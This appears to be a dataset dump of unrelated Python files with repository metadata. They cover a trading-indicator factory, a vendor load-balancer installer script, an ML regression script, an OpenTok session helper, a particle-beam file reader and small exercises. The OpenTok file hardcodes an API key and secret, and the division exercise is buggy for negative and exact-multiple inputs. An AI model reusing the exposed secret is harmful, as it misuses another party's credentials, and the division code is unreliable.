apply_and_concat_func = combine_fns.apply_and_concat_multiple_ray
else:
apply_and_concat_func = combine_fns.apply_and_concat_multiple
elif num_ret_outputs == 1:
if use_ray:
apply_and_concat_func = combine_fns.apply_and_concat_one_ray
else:
apply_and_concat_func = combine_fns.apply_and_concat_one
else:
if use_ray:
raise ValueError("Ray requires regular outputs")
apply_and_concat_func = combine_fns.apply_and_concat_none
n_params = len(param_list[0]) if len(param_list) > 0 else 1
input_tuple = tuple(input_list)
in_output_tuples = list(zip(*in_output_list))
param_tuples = list(zip(*param_list))
args_before = ()
if input_shape is not None and 'input_shape' not in kwargs_to_args:
args_before += (input_shape,)
if col is not None and 'col' not in kwargs_to_args:
args_before += (col,)
# Pass some keyword arguments as positional (required by numba)
more_args = ()
for key in kwargs_to_args:
value = _kwargs.pop(key) # important: remove from kwargs
more_args += (value,)
if flex_2d is not None and 'flex_2d' not in kwargs_to_args:
more_args += (flex_2d,)
# Caching
cache = use_cache
if cache is None and cache_func is not None:
_in_output_list = in_output_list
_param_list = param_list
if checks.is_numba_func(cache_func):
if len(in_output_list) > 0:
_in_output_list = [to_typed_list(in_outputs) for in_outputs in in_output_list]
if len(param_list) > 0:
_param_list = [to_typed_list(params) for params in param_list]
cache = cache_func(
*args_before,
*input_tuple,
*_in_output_list,
*_param_list,
*args,
*more_args,
**_kwargs
)
if return_cache:
return cache
if cache is None:
cache = ()
if not isinstance(cache, tuple):
cache = (cache,)
if len(in_output_names) > 0:
_in_output_tuples = in_output_tuples
if numba_loop:
_in_output_tuples = to_typed_list(_in_output_tuples)
_in_output_tuples = (_in_output_tuples,)
else:
_in_output_tuples = ()
if len(param_names) > 0:
_param_tuples = param_tuples
if numba_loop:
_param_tuples = to_typed_list(_param_tuples)
_param_tuples = (_param_tuples,)
else:
_param_tuples = ()
return apply_and_concat_func(
n_params,
select_params_func,
args_before,
input_tuple,
*_in_output_tuples,
*_param_tuples,
*args,
*more_args,
*cache,
**_kwargs
)
return self.from_custom_func(custom_func, as_lists=True, **kwargs)
@classmethod
def from_talib(cls, func_name, init_kwargs=None, **kwargs):
"""Build indicator class around a TA-Lib function.
Requires [TA-Lib](https://github.com/mrjbq7/ta-lib) installed.
For input, parameter and output names, see [docs](https://github.com/mrjbq7/ta-lib/blob/master/docs/index.md).
Args:
func_name (str): Function name.
init_kwargs (dict): Keyword arguments passed to `IndicatorFactory`.
**kwargs: Keyword arguments passed to `IndicatorFactory.from_custom_func`.
Returns:
Indicator
## Example
```python-repl
>>> SMA = vbt.IndicatorFactory.from_talib('SMA')
>>> sma = SMA.run(price, timeperiod=[2, 3])
>>> sma.real
sma_timeperiod 2 3
a b a b
2020-01-01 NaN NaN NaN NaN
2020-01-02 1.5 4.5 NaN NaN
2020-01-03 2.5 3.5 2.0 4.0
2020-01-04 3.5 2.5 3.0 3.0
2020-01-05 4.5 1.5 4.0 2.0
```
To get help on a function, use the `help` command:
```python-repl
>>> help(SMA.run)
Help on method run:
run(close, timeperiod=30, short_name='sma', hide_params=None, hide_default=True, **kwargs) method of builtins.type instance
Run `SMA` indicator.
* Inputs: `close`
* Parameters: `timeperiod`
* Outputs: `real`
Pass a list of parameter names as `hide_params` to hide their column levels.
Set `hide_default` to False to show the column levels of the parameters with a default value.
Other keyword arguments are passed to `vectorbt.indicators.factory.run_pipeline`.
```
"""
import talib
from talib import abstract
talib_func = getattr(talib, func_name)
info = abstract.Function(func_name)._Function__info
input_names = []
for in_names in info['input_names'].values():
if isinstance(in_names, (list, tuple)):
input_names.extend(list(in_names))
else:
input_names.append(in_names)
class_name = info['name']
class_docstring = "{}, {}".format(info['display_name'], info['group'])
short_name = info['name'].lower()
param_names = list(info['parameters'].keys())
output_names = info['output_names']
output_flags = info['output_flags']
def apply_func(input_list, _, param_tuple):
# TA-Lib functions can only process 1-dim arrays
n_input_cols = input_list[0].shape[1]
outputs = []
for col in range(n_input_cols):
outputs.append(talib_func(
*map(lambda x: x[:, col], input_list),
*param_tuple
))
if isinstance(outputs[0], tuple): # multiple outputs
outputs = list(zip(*outputs))
return list(map(np.column_stack, outputs))
return np.column_stack(outputs)
TALibIndicator = cls(
**merge_dicts(
dict(
class_name=class_name,
class_docstring=class_docstring,
short_name=short_name,
input_names=input_names,
param_names=param_names,
output_names=output_names,
output_flags=output_flags
),
init_kwargs
)
).from_apply_func(
apply_func,
pass_packed=True,
**info['parameters'],
**kwargs
)
return TALibIndicator
| [
"olegpolakow@gmail.com"
] | olegpolakow@gmail.com |
9f9a52b64939622a3491164e9c45cef35a97cf00 | 75a31c996a8f90f5f2335fd5a14bf772d426040e | /practice.py | 2178620b68da340bac9a800e4430effb8f288bb9 | [] | no_license | bharadwaj08/Python | 067baeb05e6a04f8748a0da54b2e1b9184e27285 | e0ed412c5a91a9b8146b68b98e4e7ba7bfc0fe37 | refs/heads/master | 2021-06-03T03:40:03.773261 | 2020-07-04T10:48:52 | 2020-07-04T10:48:52 | 107,049,047 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 96 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Apr 8 20:27:54 2020
@author: bbsbh
"""
import numpy | [
"bbs.bharadwaj@gmail.com"
] | bbs.bharadwaj@gmail.com |
d0d6358a5098af9cd90630433d8c73fd15a182c0 | 479052653f68882ca79edab9be3a3cf73eebb7af | /examples/brocade-traffic-manager/traffic-manager-installer.py | 23646232515939943655acc7397a860dac64d049 | [
"MIT"
] | permissive | CalvinHartwell/answers | a614fca3caf3fcadaff0925b6ab38d54497f2082 | e10f90b1e32b6c2ba8c42be6e57dafb810a8d1e0 | refs/heads/master | 2021-01-23T07:21:38.195036 | 2015-04-11T22:46:00 | 2015-04-11T22:46:00 | 32,049,011 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,780 | py | #==============================================================================
# Answers Python Library - Brocade Traffic Manager Installer Example (Riverbed)
# Copyright Calvin Hartwell 2015.
# Distributed under the MIT License.
# (See accompanying file LICENSE or copy at http://opensource.org/licenses/MIT)
#==============================================================================
from answers import *
# Riverbed Traffic Manager Automatic Installer - Version 9.9
# Download Traffic Manager Repo from archive using wget (Riverbed/Brocade url is tgz archive for traffic manager 9.9)
TrafficManagerRepo = Answers('wget http://support.riverbed.com/bin/support/download?sid=89ckt05tr2m4htokv1sphofgt3 -O ZeusTM_latest.tgz')
TrafficManagerRepo.debugMode = True
TrafficManagerRepo.timeoutInSeconds = 25
TrafficManagerRepo.Execute()
# Extract file (may vary on os)
ExtractTrafficManager = Answers('tar -zxvf ZeusTM_latest.tgz --directory /usr/tmp/')
ExtractTrafficManager.debugMode = True
ExtractTrafficManager.Execute()
# Create user group lbalancer
CreateGroup = Answers('groupadd lbalancer')
CreateGroup.debugMode = True
CreateGroup.timeoutInSeconds = 5
CreateGroup.Execute()
# Create user lbalancer
CreateUser = Answers('useradd -g lbalancer -s /sbin/nologin lbalancer')
CreateUser.debugMode = True
CreateUser.timeoutInSeconds = 5
CreateUser.Execute()
# Install and configure traffic manager
TrafficManagerInstall = Answers('/usr/tmp/ZeusTM_99_Linux-x86_64/zinstall', 'traffic-manager-answers.json')
TrafficManagerInstall.debugMode = True
TrafficManagerInstall.defaultAnswerMode = False
TrafficManagerInstall.logMode = True
TrafficManagerInstall.timeoutInSeconds = 10
TrafficManagerInstall.Execute()
# Traffic Manager GUI should now be running on http://fqdn:9090
| [
"mail@calvinhartwell.com"
] | mail@calvinhartwell.com |
bfc7e1d5b4d8a98fe867535b4bf17c95313f5c02 | 1d8fa33a3d25b8640745bfb2d8f74a844f82c09b | /mackl - 3 submission/process_reduceformice.py | 6525c370e37cf372b94c8d6bd0effa360e839be2 | [] | no_license | toycrane86/open-source-submissions | 8dc0341e8d65f74dd16a3e6afea50857d02b1d0e | 8ac2756672c5011434517e93e8411a781b2a22f8 | refs/heads/master | 2023-05-29T13:38:57.373486 | 2017-04-25T15:28:04 | 2017-04-25T15:28:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,014 | py | import numpy as np
import pandas as pd
from sklearn import preprocessing
from sklearn.ensemble import RandomForestRegressor
from sklearn.feature_selection import SelectKBest
from sklearn.feature_selection import chi2
from sklearn.feature_selection import mutual_info_regression
from sklearn.tree import DecisionTreeRegressor
## NEWBACKGROUND.CSV GENERATED FROM R SCRIPT ##
df = pd.read_csv("newbackground.csv", low_memory=False)
df = df.sort_values(by = 'challengeID', ascending = 1);
# df = pd.get_dummies(df)
# df = df.as_matrix()
outcomes = pd.read_csv("train.csv", low_memory=False)
# Get rows of training data that have reported gpa
outcomes_gpa = outcomes[pd.notnull(outcomes['gpa'])]
known_gpas = outcomes_gpa.challengeID
print(known_gpas)
# Extract the gpa's
test_outcomes = outcomes_gpa.gpa[1000:1165]
training_outcomes = outcomes_gpa.gpa[0:999]
# Extract rows of raw data
df = df.loc[df['challengeID'].isin(outcomes_gpa.challengeID)]
training_data = df.loc[df['challengeID'].isin(outcomes_gpa.challengeID[0:999])]
test_data = df.loc[df['challengeID'].isin(outcomes_gpa.challengeID[1000:1165])]
# replace NA with NaN
df = df.fillna(np.nan)
# impute replace NA's with mean
# imputer = preprocessing.Imputer(strategy = "most_frequent")
# df = imputer.fit(df)
# training_data = imputer.transform(training_data)
# test_data = imputer.transform(test_data)
print(type(training_data))
# selector = SelectKBest(mutual_info_regression, k=10).fit(training_data, training_outcomes)
# idxs = selector.get_support(indices = True)
# training_data = selector.transform(training_data)
# test_data = test_data[:,idxs]
# # Bootstrap the training set #
clf_rf = RandomForestRegressor()
clf_rf.fit(training_data, training_outcomes)
print(clf_rf.score(test_data, test_outcomes))
#print(outcomes_gpa.shape)
#print(clf_rf.score(df, outcomes_gpa.gpa))
# print("Done")
## Standardize the data set ##
#scaler = preprocessing.StandardScaler()
#normalized_training_set = scaler.fit_transform(training_set);
| [
"noreply@github.com"
] | toycrane86.noreply@github.com |
9046bd343d91d64608b2ade4e3fd1501b6404f0e | 82a3c0a7f678fca05e92cf40e312b61c0e6825b0 | /prioritization_methods/rwr/dada_and_rwr/deg_match_bin/iterator.py | 384eb3c75bc6f22e8a0c772c40af8a6cd187abb5 | [] | no_license | arp1561/SRM-PPI | 42308ef75bd84615ac4ef163971021207576641a | 5b9fa32d007b07c6b3b321a66ccd4f1d6d9ee167 | refs/heads/master | 2020-03-19T17:04:29.640634 | 2018-06-09T17:11:37 | 2018-06-09T17:11:37 | 136,743,012 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 420 | py | import pandas as pd
import pickle
import sort_all_nodes_folder as san
iter = 0
while iter<15:
path = "/home/arpit/github/SRM-PPI/prioritization_methods/rwr/components/result/connected_components_"+str(iter)+".txt"
folder = "component_bin/"+str(iter+1)
components = pd.read_csv(path,delim_whitespace="",header=None)
components=components[0]
san.bin_list(folder,components)
print iter
iter+=1
| [
"joshiarpit2@gmail.com"
] | joshiarpit2@gmail.com |
90c28a1b24aacc733867f9243c3ddb46b00fdbb6 | f6ea8a327b7ca16713009817d6344c6e2252527c | /services/tokbox.py | 86bd587359fae645452932bafbe3239953187ced | [] | no_license | DenerosArmy/pjwing | 8f3efa33de153fe5cc0c49bee9f20ec7f7b68ff5 | 74074f68cb21b1643966ee02d2696cc577724996 | refs/heads/master | 2020-04-01T19:34:10.888418 | 2012-06-24T19:56:18 | 2012-06-24T19:56:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 675 | py | import OpenTokSDK
api_key = "14260652"
api_secret = "4611823556deeea92d01eea637831386e4d50d3d"
session_address = "https://api.opentok.com/hl"
def create_session():
opentok_sdk = OpenTokSDK.OpenTokSDK(api_key, api_secret)
session_properties = {OpenTokSDK.SessionProperties.p2p_preference: "enabled"}
session = opentok_sdk.create_session(session_address, session_properties)
session_id = session.session_id
return session_id
def generate_token(session_id):
opentok_sdk = OpenTokSDK.OpenTokSDK(api_key, api_secret)
session = opentok_sdk.create_session(session_address)
token = opentok_sdk.generate_token(session.session_id)
return token
| [
"richzeng@gmail.com"
] | richzeng@gmail.com |
36429352c24ff8aa254107d967821ed03257204a | 1d76ea9eb9e13f791b7dcfebaa5fe221a6549c63 | /turtle0.py | 1a86328ccb3dc2a17b8eff23c5abe49021955a07 | [] | no_license | elpargo/py036intro | debd8da401015d087f356dbeb102b0fb29eb3a69 | 6a50ad0d0f7f839897501cff74cfb5e0fcf186c1 | refs/heads/master | 2016-09-09T20:18:00.272836 | 2014-03-15T09:23:13 | 2014-03-15T09:23:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 26 | py | print "Hi!, I'm a turtle"
| [
"jorge.vargas@gmail.com"
] | jorge.vargas@gmail.com |
99cd0951dbf516aa230f490f055c4a54a9091f1b | f9c721584974a781ddb0d139cdb13b1b24c93a40 | /semmc-fuzzer/fuzzermon/fuzzermon/fuzzermon/urls.py | 40d85584c2460f5474d224569056855fcb2429a2 | [
"BSD-3-Clause"
] | permissive | GaloisInc/semmc | 15b54c2c37b5b0224d46cc3f76e026b0f67822d4 | 2147ee3e7b966ca635289efa742f9e5f4c7bb540 | refs/heads/master | 2023-08-30T03:18:56.878466 | 2023-08-08T19:14:14 | 2023-08-08T21:13:55 | 93,451,948 | 36 | 6 | BSD-3-Clause | 2023-08-08T21:13:56 | 2017-06-05T22:16:02 | Haskell | UTF-8 | Python | false | false | 1,086 | py | """fuzzermon URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
# from django.contrib import admin
from django.urls import path
from main import views
urlpatterns = [
path('', views.arch_list),
path('arch/<int:arch_id>/', views.view_arch),
path('opcode/<int:opcode_id>/', views.view_opcode),
path('opcode/<int:opcode_id>/<str:result_type>/', views.view_opcode),
path('test/<int:test_id>/', views.view_test),
path('upload_batch', views.upload_batch),
# path('admin/', admin.site.urls),
]
| [
"jtd@galois.com"
] | jtd@galois.com |
66c8de8394149c6687a1a32c885579a99c7dadc2 | b4cb52481ae7d4352688bc8b03d0e539fc896756 | /recursion/divide_two.py | 7194c5a4421e2119eead1b09985fe4925ff79ba6 | [] | no_license | kaedub/data-structures-and-algorithms | 65a4af598a37f13203761b8bb7e0f7b84f7143b5 | 950c05a0fa2a0996966f3db55ca79c4a2e0cbf8d | refs/heads/master | 2020-04-12T13:41:30.598651 | 2019-01-05T20:24:14 | 2019-01-05T20:24:14 | 162,529,117 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 491 | py | ########################################
# Divide without using division, multiple, or modulo
#
# Example 1:
#
# Input: dividend = 10, divisor = 3
# Output: 3
# Example 2:
#
# Input: dividend = 7, divisor = -3
# Output: -2
def divide(top, bot):
if top == bot:
return 1
quotient = 0
bot_inc = bot
while (abs(bot_inc) < top):
quotient += 1
bot_inc += bot
return quotient
print( divide(10, 3) )
print( divide(7, -3) )
print( divide(10, 10) )
print( divide(-7, 3) ) | [
"kaedub16@gmail.com"
] | kaedub16@gmail.com |
5371357b6bfd6b22adde4733ffe17c3a62a18f43 | 045d8c00ef592b16cae697bd248549454f1a38c7 | /EvaluationMetrics/WeightedCONNMatrix.py | 83362172fcda2f2ba1a5065035c1fe157a26832a | [] | no_license | ranganmostofa/Optimal-Learning-Schedules-for-Self-Organizing-Maps | b022c14f91c48046782bf90f673334cd875d1432 | 67983c1f23793400bcb0af45dd88c7f588ea6b75 | refs/heads/master | 2020-03-21T09:36:14.924879 | 2019-04-14T03:51:34 | 2019-04-14T03:51:35 | 138,408,301 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 325 | py | from WeightedCADJMatrix import WeightedCADJMatrix
class WeightedCONNMatrix:
"""
"""
@staticmethod
def compute(self_organizing_map, input_map):
wcadj_matrix = WeightedCADJMatrix.compute(self_organizing_map, input_map)
wconn_matrix = wcadj_matrix + wcadj_matrix.T
return wconn_matrix
| [
"rm48@rice.edu"
] | rm48@rice.edu |
8cf1a15642d330e409b9b8f3de5b9c053fe45d01 | ea1d88d99e854ceb7f5620bd371349acb51f6607 | /SimulationFramework/Modules/read_beam_file.py | 3b751981b3a0cbed54c6f0a08b7091980e5de51f | [] | no_license | VELA-CLARA-software/SimFramed | 7dee4efc86531662495eed1bf2a3e9ec8287b640 | b647590f8cb87ea2bffed6733012b6e9141032bb | refs/heads/master | 2022-12-07T05:13:46.486342 | 2020-08-10T13:52:13 | 2020-08-10T13:52:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 56,824 | py | import os, time, csv, sys, subprocess
import copy
import h5py
import numpy as np
import munch
import scipy.constants as constants
from scipy.spatial.distance import cdist
from scipy.spatial import ConvexHull
from scipy.stats import gaussian_kde
from itertools import compress
try:
import sdds
except:
print('sdds failed to load')
pass
sys.path.append(os.path.abspath(__file__+'/../../'))
import SimulationFramework.Modules.read_gdf_file as rgf
import SimulationFramework.Modules.minimumVolumeEllipse as mve
MVE = mve.EllipsoidTool()
class beam(munch.Munch):
particle_mass = constants.m_e
E0 = particle_mass * constants.speed_of_light**2
E0_eV = E0 / constants.elementary_charge
q_over_c = (constants.elementary_charge / constants.speed_of_light)
speed_of_light = constants.speed_of_light
def __init__(self, sddsindex=0):
self.beam = {}
self.sddsindex = sddsindex
def set_particle_mass(self, mass=constants.m_e):
self.particle_mass = mass
def normalise_to_ref_particle(self, array, index=0,subtractmean=False):
array = copy.copy(array)
array[1:] = array[0] + array[1:]
if subtractmean:
array = array - array[0]#np.mean(array)
return array
def reset_dicts(self):
self.beam = {}
self.twiss = {}
self.slice = {}
self._tbins = []
self._pbins = []
def read_SDDS_beam_file(self, fileName, charge=None, ascii=False):
self.reset_dicts()
self.sdds = sdds.SDDS(self.sddsindex)
self.sdds.load(fileName)
for col in range(len(self.sdds.columnName)):
if len(self.sdds.columnData[col]) == 1:
self.beam[self.sdds.columnName[col]] = np.array(self.sdds.columnData[col][0])
else:
self.beam[self.sdds.columnName[col]] = np.array(self.sdds.columnData[col])
self.SDDSparameters = dict()
for param in range(len(self.sdds.parameterName)):
self.SDDSparameters[self.sdds.parameterName[param]] = self.sdds.parameterData[param]
# print 'self.SDDSparameterNames = ', self.SDDSparameterNames
self.beam['code'] = "SDDS"
cp = self.beam['p'] * self.E0_eV
cpz = cp / np.sqrt(self.beam['xp']**2 + self.beam['yp']**2 + 1)
cpx = self.beam['xp'] * cpz
cpy = self.beam['yp'] * cpz
self.beam['px'] = cpx * self.q_over_c
self.beam['py'] = cpy * self.q_over_c
self.beam['pz'] = cpz * self.q_over_c
self.beam['t'] = self.beam['t']
self.beam['z'] = (-1*self.Bz * constants.speed_of_light) * (self.t-np.mean(self.t)) #np.full(len(self.t), 0)
if 'Charge' in self.SDDSparameters and len(self.SDDSparameters['Charge']) > 0:
self.beam['total_charge'] = self.SDDSparameters['Charge'][0]
elif charge is None:
self.beam['total_charge'] = 0
else:
self.beam['total_charge'] = charge
self.beam['charge'] = []
def write_SDDS_file(self, filename, ascii=False, xyzoffset=[0,0,0]):
"""Save an SDDS file using the SDDS class."""
xoffset = xyzoffset[0]
yoffset = xyzoffset[1]
zoffset = xyzoffset[2] # Don't think I need this because we are using t anyway...
x = sdds.SDDS(self.sddsindex)
if ascii:
x.mode = x.SDDS_ASCII
else:
x.mode = x.SDDS_BINARY
# {x, xp, y, yp, t, p, particleID}
Cnames = ["x", "xp", "y", "yp", "t","p"]
Ccolumns = ['x', 'xp', 'y', 'yp', 't', 'BetaGamma']
Ctypes = [x.SDDS_DOUBLE, x.SDDS_DOUBLE, x.SDDS_DOUBLE, x.SDDS_DOUBLE, x.SDDS_DOUBLE, x.SDDS_DOUBLE]
Csymbols = ["", "x'","","y'","",""]
Cunits = ["m","","m","","s","m$be$nc"]
Ccolumns = [np.array(self.x) - float(xoffset), self.xp, np.array(self.y) - float(yoffset), self.yp, self.t , self.cp/self.E0_eV]
# {Step, pCentral, Charge, Particles, IDSlotsPerBunch}
Pnames = ["pCentral", "Charge", "Particles"]
Ptypes = [x.SDDS_DOUBLE, x.SDDS_DOUBLE, x.SDDS_LONG]
Psymbols = ["p$bcen$n", "", ""]
Punits = ["m$be$nc", "C", ""]
parameterData = [[np.mean(self.BetaGamma)], [abs(self.beam['total_charge'])], [len(self.x)]]
for i in range(len(Ptypes)):
x.defineParameter(Pnames[i], Psymbols[i], Punits[i],"","", Ptypes[i], "")
x.setParameterValueList(Pnames[i], parameterData[i])
for i in range(len(Ctypes)):
# name, symbol, units, description, formatString, type, fieldLength
x.defineColumn(Cnames[i], Csymbols[i], Cunits[i],"","", Ctypes[i], 0)
x.setColumnValueLists(Cnames[i], [list(Ccolumns[i])])
x.save(filename)
def set_beam_charge(self, charge):
self.beam['total_charge'] = charge
def read_csv_file(self, file, delimiter=' '):
with open(file, 'r') as f:
data = np.array([l for l in csv.reader(f, delimiter=delimiter, quoting=csv.QUOTE_NONNUMERIC, skipinitialspace=True)])
return data
def write_csv_file(self, file, data):
if sys.version_info[0] > 2:
with open(file, 'w', newline='') as f:
writer = csv.writer(f, delimiter=' ', quoting=csv.QUOTE_NONNUMERIC, skipinitialspace=True)
[writer.writerow(l) for l in data]
else:
with open(file, 'wb') as f:
writer = csv.writer(f, delimiter=' ', quoting=csv.QUOTE_NONNUMERIC, skipinitialspace=True)
[writer.writerow(l) for l in data]
def read_astra_beam_file(self, file, normaliseZ=False):
starttime = time.time()
self.reset_dicts()
data = self.read_csv_file(file)
# datanp = np.loadtxt(file)
self.interpret_astra_data(data, normaliseZ=normaliseZ)
# def read_hdf5_beam(self, data):
# self.reset_dicts()
# self.interpret_astra_data(data)
def interpret_astra_data(self, data, normaliseZ=False):
x, y, z, cpx, cpy, cpz, clock, charge, index, status = np.transpose(data)
zref = z[0]
self.beam['code'] = "ASTRA"
self.beam['reference_particle'] = data[0]
# if normaliseZ:
# self.beam['reference_particle'][2] = 0
self.beam['longitudinal_reference'] = 'z'
znorm = self.normalise_to_ref_particle(z, subtractmean=True)
z = self.normalise_to_ref_particle(z, subtractmean=False)
cpz = self.normalise_to_ref_particle(cpz, subtractmean=False)
clock = self.normalise_to_ref_particle(clock, subtractmean=True)
cp = np.sqrt(cpx**2 + cpy**2 + cpz**2)
self.beam['x'] = x
self.beam['y'] = y
self.beam['z'] = z
self.beam['px'] = cpx * self.q_over_c
self.beam['py'] = cpy * self.q_over_c
self.beam['pz'] = cpz * self.q_over_c
self.beam['clock'] = 1.0e-9*clock
self.beam['charge'] = 1.0e-9*charge
self.beam['index'] = index
self.beam['status'] = status
# print self.Bz
self.beam['t'] = [clock if status == -1 else ((z-zref) / (-1 * Bz * constants.speed_of_light)) for status, z, Bz, clock in zip(self.beam['status'], z, self.Bz, self.beam['clock'])]
# self.beam['t'] = self.z / (1 * self.Bz * constants.speed_of_light)#[time if status is -1 else 0 for time, status in zip(clock, status)]#
self.beam['total_charge'] = np.sum(self.beam['charge'])
def read_csrtrack_beam_file(self, file):
self.reset_dicts()
data = self.read_csv_file(file)
self.beam['code'] = "CSRTrack"
self.beam['reference_particle'] = data[0]
self.beam['longitudinal_reference'] = 'z'
z, x, y, cpz, cpx, cpy, charge = np.transpose(data[1:])
z = self.normalise_to_ref_particle(z, subtractmean=False)
cpz = self.normalise_to_ref_particle(cpz, subtractmean=False)
cp = np.sqrt(cpx**2 + cpy**2 + cpz**2)
self.beam['x'] = x
self.beam['y'] = y
self.beam['z'] = z
self.beam['px'] = cpx * self.q_over_c
self.beam['py'] = cpy * self.q_over_c
self.beam['pz'] = cpz * self.q_over_c
self.beam['clock'] = np.full(len(self.x), 0)
self.beam['clock'][0] = data[0, 0] * 1e-9
self.beam['index'] = np.full(len(self.x), 5)
self.beam['status'] = np.full(len(self.x), 1)
self.beam['t'] = self.z / (-1 * self.Bz * constants.speed_of_light)# [time if status is -1 else 0 for time, status in zip(clock, self.beam['status'])]
self.beam['charge'] = charge
self.beam['total_charge'] = np.sum(self.beam['charge'])
def read_vsim_h5_beam_file(self, filename, charge=70e-12, interval=1):
self.reset_dicts()
with h5py.File(filename, "r") as h5file:
data = np.array(h5file.get('/BeamElectrons'))[1:-1:interval]
z, y, x, cpz, cpy, cpx = data.transpose()
self.beam['code'] = "VSIM"
self.beam['longitudinal_reference'] = 'z'
cp = np.sqrt(cpx**2 + cpy**2 + cpz**2)
self.beam['x'] = x
self.beam['y'] = y
self.beam['z'] = z
self.beam['px'] = cpx * self.particle_mass
self.beam['py'] = cpy * self.particle_mass
self.beam['pz'] = cpz * self.particle_mass
self.beam['t'] = [(z / (-1 * Bz * constants.speed_of_light)) for z, Bz in zip(self.z, self.Bz)]
# self.beam['t'] = self.z / (1 * self.Bz * constants.speed_of_light)#[time if status is -1 else 0 for time, status in zip(clock, status)]#
self.beam['total_charge'] = charge
self.beam['charge'] = []
def read_pacey_beam_file(self, file, charge=250e-12):
self.reset_dicts()
data = self.read_csv_file(file, delimiter='\t')
self.beam['code'] = "TPaceyASTRA"
self.beam['longitudinal_reference'] = 'z'
x, y, z, cpx, cpy, cpz = np.transpose(data)
cp = np.sqrt(cpx**2 + cpy**2 + cpz**2)
self.beam['x'] = x
self.beam['y'] = y
self.beam['z'] = z
self.beam['px'] = cpx * self.q_over_c
self.beam['py'] = cpy * self.q_over_c
self.beam['pz'] = cpz * self.q_over_c
self.beam['t'] = [(z / (-1 * Bz * constants.speed_of_light)) for z, Bz in zip(self.z, self.Bz)]
# self.beam['t'] = self.z / (1 * self.Bz * constants.speed_of_light)#[time if status is -1 else 0 for time, status in zip(clock, status)]#
self.beam['total_charge'] = charge
self.beam['charge'] = []
def convert_csrtrackfile_to_astrafile(self, csrtrackfile, astrafile):
data = self.read_csv_file(csrtrackfile)
z, x, y, cpz, cpx, cpy, charge = np.transpose(data[1:])
charge = -charge*1e9
clock0 = (data[0, 0] / constants.speed_of_light) * 1e9
clock = np.full(len(x), 0)
clock[0] = clock0
index = np.full(len(x), 1)
status = np.full(len(x), 5)
array = np.array([x, y, z, cpx, cpy, cpz, clock, charge, index, status]).transpose()
self.write_csv_file(astrafile, array)
def find_nearest_vector(self, nodes, node):
return cdist([node], nodes).argmin()
def rms(self, x, axis=None):
return np.sqrt(np.mean(x**2, axis=axis))
def create_ref_particle(self, array, index=0, subtractmean=False):
array[1:] = array[0] + array[1:]
if subtractmean:
array = array - np.mean(array)
return array
def write_astra_beam_file(self, file, index=1, status=5, charge=None, normaliseZ=False):
if not isinstance(index,(list, tuple, np.ndarray)):
if len(self.beam['charge']) == len(self.x):
chargevector = 1e9*self.beam['charge']
else:
chargevector = np.full(len(self.x), 1e9*self.charge/len(self.x))
if not isinstance(index,(list, tuple, np.ndarray)):
indexvector = np.full(len(self.x), index)
statusvector = self.beam['status'] if 'status' in self.beam else status if isinstance(status,(list, tuple, np.ndarray)) else np.full(len(self.x), status)
''' if a particle is emitting from the cathode it's z value is 0 and it's clock value is finite, otherwise z is finite and clock is irrelevant (thus zero) '''
if self.beam['longitudinal_reference'] == 't':
zvector = [0 if status == -1 and t == 0 else z for status, z, t in zip(statusvector, self.z, self.t)]
else:
zvector = self.z
''' if the clock value is finite, we calculate it from the z value, using Betaz '''
# clockvector = [1e9*z / (1 * Bz * constants.speed_of_light) if status == -1 and t == 0 else 1.0e9*t for status, z, t, Bz in zip(statusvector, self.z, self.t, self.Bz)]
clockvector = [1.0e9*t for status, z, t, Bz in zip(statusvector, self.z, self.t, self.Bz)]
''' this is the ASTRA array in all it's glory '''
array = np.array([self.x, self.y, zvector, self.cpx, self.cpy, self.cpz, clockvector, chargevector, indexvector, statusvector]).transpose()
if 'reference_particle' in self.beam:
ref_particle = self.beam['reference_particle']
# print 'we have a reference particle! ', ref_particle
# np.insert(array, 0, ref_particle, axis=0)
else:
''' take the rms - if the rms is 0 set it to 1, so we don't get a divide by error '''
rms_vector = [a if abs(a) > 0 else 1 for a in self.rms(array, axis=0)]
''' normalise the array '''
norm_array = array / rms_vector
''' take the meen of the normalised array '''
mean_vector = np.mean(norm_array, axis=0)
''' find the index of the vector that is closest to the mean - if you read in an ASTRA file, this should actually return the reference particle! '''
nearest_idx = self.find_nearest_vector(norm_array, mean_vector);
ref_particle = array[nearest_idx]
''' set the closest mean vector to be in position 0 in the array '''
array = np.roll(array, -1*nearest_idx, axis=0)
''' normalise Z to the reference particle '''
array[1:,2] = array[1:,2] - ref_particle[2]
''' should we leave Z as the reference value, set it to 0, or set it to be some offset? '''
if not normaliseZ is False:
array[0,2] = 0
if not isinstance(normaliseZ,(bool)):
array[0,2] += normaliseZ
''' normalise pz and the clock '''
# print('Mean pz = ', np.mean(array[:,5]))
array[1:,5] = array[1:,5] - ref_particle[5]
array[0,6] = array[0,6] + ref_particle[6]
np.savetxt(file, array, fmt=('%.12e','%.12e','%.12e','%.12e','%.12e','%.12e','%.12e','%.12e','%d','%d'))
def write_vsim_beam_file(self, file, normaliseT=False):
if len(self.beam['charge']) == len(self.x):
chargevector = self.beam['charge']
else:
chargevector = np.full(len(self.x), self.beam['total_charge']/len(self.x))
if normaliseT:
tvector = self.t - np.mean(self.t)
zvector = self.z - np.mean(self.z)
else:
tvector = self.t
zvector = self.z
zvector = [t * (1 * Bz * constants.speed_of_light) if z == 0 else z for z, t, Bz in zip(zvector, tvector, self.Bz)]
''' this is the VSIM array in all it's glory '''
array = np.array([zvector, self.y, self.x, self.Bz*self.gamma*constants.speed_of_light, self.By*self.gamma*constants.speed_of_light, self.Bx*self.gamma*constants.speed_of_light]).transpose()
